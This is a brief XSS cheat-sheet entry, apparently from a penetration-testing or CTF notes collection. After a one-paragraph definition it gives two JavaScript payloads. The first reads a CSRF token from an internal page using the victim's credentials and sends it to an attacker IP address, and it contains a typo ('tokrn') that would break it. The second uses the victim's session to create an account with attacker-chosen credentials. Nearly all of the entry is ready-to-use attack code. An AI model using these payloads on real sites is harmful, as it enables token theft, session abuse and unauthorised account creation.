XSS
Description
Cross site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.
Usage
Scripts
var req = new XMLHttpRequest();
req.open("GET", "http://internal.qu35t.pw/", false);
req.withCredentials = true;
req.send();
var response = req.responseText;
var parser = new DOMParser();
var htmlDoc = parser.parseFromString(response, 'text/html');
var token = htmlDoc.getElementsByName("_token")[0].value;
var req2 = new XMLHttpRequest();
req2.open("GET", "http://10.10.14.10/" + tokrn, true);
req2.send();
var req = new XMLHttpRequest();
req.open("GET", "http://internal.qu35t.pw/", false);
req.withCredentials = true;
req.send();
var response = req.responseText;
var req2 = new XMLHttpRequest();
req2.withCredentials = true;
var params = "username=qu35t&pass=qu35t";
req2.open("POST", "http://internal.qu35t.pw/create", false);
req2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req2.send(params);